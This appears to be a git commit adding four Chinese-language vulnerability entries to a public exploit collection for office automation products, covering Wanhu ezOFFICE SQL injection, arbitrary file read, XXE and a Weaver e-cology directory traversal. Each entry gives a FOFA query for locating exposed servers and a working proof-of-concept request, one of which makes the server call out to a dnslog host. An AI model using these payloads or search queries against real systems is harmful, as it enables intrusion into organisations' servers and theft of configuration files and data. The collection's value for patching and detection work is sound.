更新漏洞库：OA产品漏洞/

2025-11-05 10:50:23 +00:00 · 2022-09-13 10:54:24 +08:00 · 2022-09-13 10:54:24 +08:00 · dec8314938
commit dec8314938
parent 6819988d68
4 changed files with 131 additions and 0 deletions
--- a/OA产品漏洞/万户OA
+++ b/OA产品漏洞/万户OA
@ -0,0 +1,33 @@
+# 万户OA DocumentEdit.jsp SQL注入漏洞
+
+## 漏洞描述
+
+万户OA DocumentEdit.jsp文件存在SQL注入漏洞，攻击者通过发送特殊的请求包可以对数据库进行SQL注入，获取服务器敏感信息
+
+## 漏洞影响
+
+```
+万户OA
+```
+
+## FOFA
+
+```
+app="万户网络-ezOFFICE"
+```
+
+## 漏洞复现
+
+产品页面
+
+![1](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209131047757.png)
+
+验证POC
+
+```
+/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'--
+```
+
+![1662358602569-71e26a34-726b-4d75-b683-225884ec7b4a](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209131047397.png)
+
+![3](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209131047713.png)
--- a/任意文件读取漏洞.md
+++ b/任意文件读取漏洞.md
@ -0,0 +1,31 @@
+# 万户OA DownloadServlet 任意文件读取漏洞
+
+## 漏洞描述
+
+万户OA DownloadServlet接口存在任意文件读取漏洞，攻击者通过漏洞可以读取服务器中的敏感文件，获取敏感信息
+
+## 漏洞影响
+
+```
+万户OA
+```
+
+## FOFA
+
+```
+app="万户网络-ezOFFICE"
+```
+
+## 漏洞复现
+
+产品页面
+
+![1](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209131050540.png)
+
+验证POC
+
+```
+/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2 
+```
+
+![2](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209131050803.png)
--- a/OA产品漏洞/万户OA
+++ b/OA产品漏洞/万户OA
@ -0,0 +1,36 @@
+# 万户OA TeleConferenceService XXE注入漏洞
+
+## 漏洞描述
+
+万户OA TeleConferenceService接口存在XXE注入漏洞，攻击者通过漏洞可以继续XXE注入获取服务器敏感信息
+
+## 漏洞影响
+
+```
+万户OA
+```
+
+## FOFA
+
+```
+app="万户网络-ezOFFICE"
+```
+
+## 漏洞复现
+
+产品页面
+
+![1](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209131048922.png)
+
+验证POC
+
+```
+POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService
+
+<?xml version="1.0" encoding="UTF-8" ?>
+<!DOCTYPE ANY [
+<!ENTITY xxe SYSTEM "http://fep6kf.dnslog.cn" >]>        
+<value>&xxe;</value>
+```
+
+![2](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209131049806.png)
--- a/OA产品漏洞/泛微OA
+++ b/OA产品漏洞/泛微OA
@ -0,0 +1,31 @@
+# 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
+
+## 漏洞描述
+
+泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等，其中 jqueryFileTree.jsp 文件中 dir 参数存在目录遍历漏洞，攻击者通过漏洞可以获取服务器文件目录信息
+
+## 漏洞影响
+
+```
+泛微e-cology 9.0
+```
+
+## FOFA
+
+```
+app="泛微-协同办公OA"
+```
+
+## 漏洞复现
+
+登录页面
+
+![1](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209131045944.png)
+
+验证POC
+
+```
+/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
+```
+
+![2](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209131046623.png)